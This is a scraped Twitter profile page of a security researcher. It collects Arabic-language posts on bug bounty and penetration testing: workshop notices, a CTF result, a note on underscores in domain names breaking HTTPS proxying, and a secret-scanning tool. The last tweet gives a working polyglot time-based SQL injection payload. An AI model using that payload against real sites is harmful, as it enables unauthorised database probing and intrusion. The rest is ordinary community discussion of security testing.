Abdullah Almutawa (@_d3caff) 's Twitter Profile
Abdullah Almutawa

@_d3caff

D3CAFF From Decaffeine | 3x CVEs | eWPTX eWPT CCNA

ID: 1820126252088586240

linkhttps://github.com/AbdullahAlmutawa calendar_today04-08-2024 15:54:58

43 Tweet

143 Takipçi

162 Takip Edilen

TechHack Club (@0xtechhack) 's Twitter Profile Photo

كيف تكتشف أول ثغرة لك؟🐞 🗓: الأربعاء 09/04/2025 ⏰: 9:00 م 🎤: عبدالعزيز الماضي | Abdulaziz Almadhi 📍: عن بعد رابط الحضور: techhubmu.com/redirect لاتفوّت الفرصة، وخلها تكون بداية رحلتك في عالم اصطياد الثغرات.

كيف تكتشف أول ثغرة لك؟🐞

🗓: الأربعاء 09/04/2025
⏰: 9:00 م
🎤: عبدالعزيز الماضي | <a href="/3zizMe_/">Abdulaziz Almadhi</a>    
📍: عن بعد

رابط الحضور:
techhubmu.com/redirect

لاتفوّت الفرصة، وخلها تكون بداية رحلتك في عالم اصطياد الثغرات.
TechHack Club (@0xtechhack) 's Twitter Profile Photo

📣 ورشة عمل: مقدمة في أمن الأنظمة التشغيلية OT 🔐⚙️ احمِ الأنظمة الصناعية من الهجمات! يقدّمها أحمد آل صالح، رئيس هندسة التحكم والأمن السيبراني في أرامكو، بخبرة 18+ سنة. 🗓️ الخميس 24/4/2025 ⏰ 9:00م 📍عن بعد رابط الحضور: techhubmu.com/redirect

📣 ورشة عمل: مقدمة في أمن الأنظمة التشغيلية OT 🔐⚙️

احمِ الأنظمة الصناعية من الهجمات!
يقدّمها أحمد آل صالح، رئيس هندسة التحكم والأمن السيبراني في أرامكو، بخبرة 18+ سنة.

🗓️ الخميس 24/4/2025
⏰ 9:00م
📍عن بعد

رابط الحضور:
techhubmu.com/redirect
TechHack Club (@0xtechhack) 's Twitter Profile Photo

نبارك لبطل TechHack CTF في نسختها الثانية: فالح العتيبي ⭐️💫 الشكر موصول للرعاة: CyberHub | سايبرهَب CyberXtream CyberTx Academy إليكم صور من البطولة: 👇

نبارك لبطل TechHack CTF في نسختها الثانية:

فالح العتيبي ⭐️💫

الشكر موصول للرعاة:
<a href="/CyberhubSa/">CyberHub | سايبرهَب</a> 
<a href="/Cyber_Xtream/">CyberXtream</a> 
<a href="/CyberTx_sa/">CyberTx Academy</a> 
إليكم صور من البطولة:
👇
Abdullah Almutawa (@_d3caff) 's Twitter Profile Photo

في حال كنت تسوي Internal PT وطحت على دومين قريب من هالإسم: test_dev.local الموقع شغال طبيعي، بس الغريب انه في حال استعملت Burp او Zap الموقع يرجّع SSL_ERROR_ILLEGAL_PARAMETER_ALERT مع انهم يشتغلون على اي موقع ثاني، تقدر تعرف وين المشكلة؟

Nadim Alzahrani (@0xnzs) 's Twitter Profile Photo

ولله الحمد بداية موفّقة في منصة مكافآت الثغرات ، تمكّنت من اكتشاف 10 ثغرات عالية الخطورة “high” خلال الاسابيع الماضية

ولله الحمد بداية موفّقة في <a href="/BugBountySA/">منصة مكافآت الثغرات</a> ، تمكّنت من اكتشاف 10 ثغرات عالية الخطورة “high” خلال الاسابيع الماضية
Abdullah Almutawa (@_d3caff) 's Twitter Profile Photo

هذا سيناريو حقيقي صار لي, والسبب ببساطة كان وجود (_) في الDomain Name. ليه؟ نأخذ خطوة ورا ونقرأ RFC 1123 بنحصل ان الDomain Name المفترض يتكون من حروف إنجليزية، أرقام، و(-) فقط. في حال الموقع كان HTTP بيشتغل تمام مع Burp, لكن لو كان HTTPS وصار لازم يسوي Handshake بتطلع المشكلة.

هذا سيناريو حقيقي صار لي, والسبب ببساطة كان وجود (_) في الDomain Name.
ليه؟ نأخذ خطوة ورا ونقرأ RFC 1123 بنحصل ان الDomain Name المفترض يتكون من حروف إنجليزية، أرقام، و(-) فقط.

في حال الموقع كان HTTP بيشتغل تمام مع Burp, لكن لو كان HTTPS وصار لازم يسوي Handshake بتطلع المشكلة.
Abdulaziz (@stuipds) 's Twitter Profile Photo

Race Condition Led to Admin Takeover خطأ مبرمج سمح لنا نخترق حساب الادمن ! بالبدايه رجعت لكم بمقالة جديدة انا و Abdullah Angawi قبل مانبدا اغلبكم اكيد عارف وش هو الrace condition بس الي اغلبه مايعرف انه فيه نوع اسمه time-of-check to time-of-use طيب بسم الله خلونا بالبدايه

Race Condition Led to Admin Takeover

خطأ مبرمج سمح لنا نخترق حساب الادمن !

بالبدايه رجعت لكم بمقالة جديدة انا و <a href="/0xAbady/">Abdullah Angawi</a>  

قبل مانبدا اغلبكم اكيد عارف وش هو الrace condition 

بس الي اغلبه مايعرف انه فيه نوع اسمه 
time-of-check to time-of-use

طيب بسم الله خلونا بالبدايه
Nadim Alzahrani (@0xnzs) 's Twitter Profile Photo

نستعد في CyberTx Academy لإطلاق المرحلة الرابعة من رحلتنا، استكمالًا لما بدأناه في بناء بيئة تدريبية متخصصة وشاملة في مجال الأمن السيبراني وتتضمن هذي المرحلة مجموعة من التحديثات، ومن أبرزها: •تطوير المنصة الإلكترونية لتكون أكثر استقرارًا وفعالية •تقديم دورات وورش عمل حضورية

Abdullah Almutawa (@_d3caff) 's Twitter Profile Photo

سويت أداة بسيطة بـ Go تساعدك تسوي سكان للكود وتلقط الدوال الخطيرة والـ Hardcoded Secrets. تعتمد على مجموعة Regex جاهزة تبحث عنها بالكود. حاليًا فيها أكثر من 500 نمط مختلف لأنواع الـ Secrets والدوال الخطيرة. وإذا عندك أنماط ثانية تبغى تضيفها، تقدر تساهم وتفتح PR في المشروع.

سويت أداة بسيطة بـ Go تساعدك تسوي سكان للكود وتلقط الدوال الخطيرة والـ Hardcoded Secrets.

تعتمد على مجموعة Regex جاهزة تبحث عنها بالكود.

حاليًا فيها أكثر من 500 نمط مختلف لأنواع الـ Secrets والدوال الخطيرة.

وإذا عندك أنماط ثانية تبغى تضيفها، تقدر تساهم وتفتح PR في المشروع.
Abdullah Almutairi (@plendux) 's Twitter Profile Photo

Time-Based SQLI Payload: /(select(0)from(select(sleep(9)))v)/*'%2B(select(0)from(select(sleep(9)))v)%2B'"%2B(select(0)from(select(sleep(9)))v)%2B"*/

Time-Based SQLI
Payload:
/(select(0)from(select(sleep(9)))v)/*'%2B(select(0)from(select(sleep(9)))v)%2B'"%2B(select(0)from(select(sleep(9)))v)%2B"*/